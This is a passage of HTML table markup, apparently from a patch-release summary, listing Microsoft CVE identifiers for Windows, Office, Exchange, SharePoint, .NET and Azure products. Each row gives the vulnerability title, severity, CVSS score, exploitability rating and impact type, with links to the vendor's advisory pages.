  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47288"><span>CVE-2026-47288</span></a></td>
  <td width="256" class="xl68">Windows Kerberos Key
  Distribution Center (KDC) Remote Code Execution</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45657"><span>CVE-2026-45657</span></a></td>
  <td width="256" class="xl68">Windows Kernel Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48574"><span>CVE-2026-48574</span></a></td>
  <td width="256" class="xl68">Windows Media Remote
  Code Execution Vulnerability</td>
  <td class="xl72">Critical</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45490"><span>CVE-2026-45490</span></a></td>
  <td width="256" class="xl68">.NET SDK Elevation of
  Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45491"><span>CVE-2026-45491</span></a></td>
  <td width="256" class="xl68">.NET Tampering
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Tampering</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45591"><span>CVE-2026-45591</span></a></td>
  <td width="256" class="xl68">ASP.NET Core Denial of
  Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47643"><span>CVE-2026-47643</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">9.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41098"><span>CVE-2026-41098</span></a></td>
  <td width="256" class="xl68">Azure Stack Edge
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45642"><span>CVE-2026-45642</span></a></td>
  <td width="256" class="xl68">Microsoft Azure
  Attestation service and Device Health Attestation Service Spoofing
  Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.9</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45650"><span>CVE-2026-45650</span></a></td>
  <td width="256" class="xl68">Microsoft Bing Search
  Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45637"><span>CVE-2026-45637</span></a></td>
  <td width="256" class="xl68">Microsoft DWM Core
  Library Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45647"><span>CVE-2026-45647</span></a></td>
  <td width="256" class="xl68">Microsoft Defender for
  Endpoint for Mac Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-40371"><span>CVE-2026-40371</span></a></td>
  <td width="256" class="xl68">Microsoft Dynamics 365
  (on-premises) Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44822"><span>CVE-2026-44822</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.2</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45455"><span>CVE-2026-45455</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45469"><span>CVE-2026-45469</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44817"><span>CVE-2026-44817</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44818"><span>CVE-2026-44818</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44820"><span>CVE-2026-44820</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44823"><span>CVE-2026-44823</span></a></td>
  <td width="256" class="xl68">Microsoft Excel Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45459"><span>CVE-2026-45459</span></a></td>
  <td width="256" class="xl68">Microsoft Excel
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45504"><span>CVE-2026-45504</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45502"><span>CVE-2026-45502</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45503"><span>CVE-2026-45503</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45583"><span>CVE-2026-45583</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45500"><span>CVE-2026-45500</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45501"><span>CVE-2026-45501</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47631"><span>CVE-2026-47631</span></a></td>
  <td width="256" class="xl68">Microsoft Exchange
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42986"><span>CVE-2026-42986</span></a></td>
  <td width="256" class="xl68">Microsoft Graphics
  Component Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-41092"><span>CVE-2026-41092</span></a></td>
  <td width="256" class="xl68">Microsoft Kinect
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45644"><span>CVE-2026-45644</span></a></td>
  <td width="256" class="xl68">Microsoft Live Share
  Canvas SDK Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47293"><span>CVE-2026-47293</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Click-To-Run Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45485"><span>CVE-2026-45485</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44821"><span>CVE-2026-44821</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45483"><span>CVE-2026-45483</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Project Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45475"><span>CVE-2026-45475</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44819"><span>CVE-2026-44819</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-44824"><span>CVE-2026-44824</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45645"><span>CVE-2026-45645</span></a></td>
  <td width="256" class="xl68">Microsoft Office
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-49161"><span>CVE-2026-49161</span></a></td>
  <td width="256" class="xl68">Microsoft PC Manager
  Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42902"><span>CVE-2026-42902</span></a></td>
  <td width="256" class="xl68">Microsoft PowerToys
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45484"><span>CVE-2026-45484</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Elevation of Privilege Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">EoP</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45454"><span>CVE-2026-45454</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">6.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47298"><span>CVE-2026-47298</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Remote Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45467"><span>CVE-2026-45467</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45468"><span>CVE-2026-45468</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45479"><span>CVE-2026-45479</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45453"><span>CVE-2026-45453</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47636"><span>CVE-2026-47636</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47637"><span>CVE-2026-47637</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47638"><span>CVE-2026-47638</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47639"><span>CVE-2026-47639</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47641"><span>CVE-2026-47641</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33113"><span>CVE-2026-33113</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45462"><span>CVE-2026-45462</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45464"><span>CVE-2026-45464</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45465"><span>CVE-2026-45465</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47634"><span>CVE-2026-47634</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-47640"><span>CVE-2026-47640</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45481"><span>CVE-2026-45481</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">1</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48560"><span>CVE-2026-48560</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-48562"><span>CVE-2026-48562</span></a></td>
  <td width="256" class="xl68">Microsoft SharePoint
  Server Spoofing Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">4.6</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Spoofing</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-42835"><span>CVE-2026-42835</span></a></td>
  <td width="256" class="xl68">Microsoft Teams for
  Android Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.1</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45606"><span>CVE-2026-45606</span></a></td>
  <td width="256" class="xl68">Microsoft UxTheme
  Library (uxtheme.dll) Denial of Service Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">5.5</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">DoS</td>
 </tr>
 <tr height="69">
  <td class="xl67" height="69"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45482"><span>CVE-2026-45482</span></a></td>
  <td width="256" class="xl68">Microsoft Visual
  Studio Code CoPilot Chat Extension Security Feature Bypass Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">8.4</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">SFB</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45466"><span>CVE-2026-45466</span></a></td>
  <td width="256" class="xl68">Microsoft Word
  Information Disclosure Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">3.3</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">3</td>
  <td class="xl70">Info</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45471"><span>CVE-2026-45471</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45486"><span>CVE-2026-45486</span></a></td>
  <td width="256" class="xl68">Microsoft Word Remote
  Code Execution Vulnerability</td>
  <td class="xl69">Important</td>
  <td class="xl70">7.8</td>
  <td class="xl70">No</td>
  <td class="xl70">No</td>
  <td class="xl70">2</td>
  <td class="xl70">RCE</td>
 </tr>
 <tr height="47">
  <td class="xl67" height="47"><a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45643"><span>CVE-2026-45643</span></a></td>
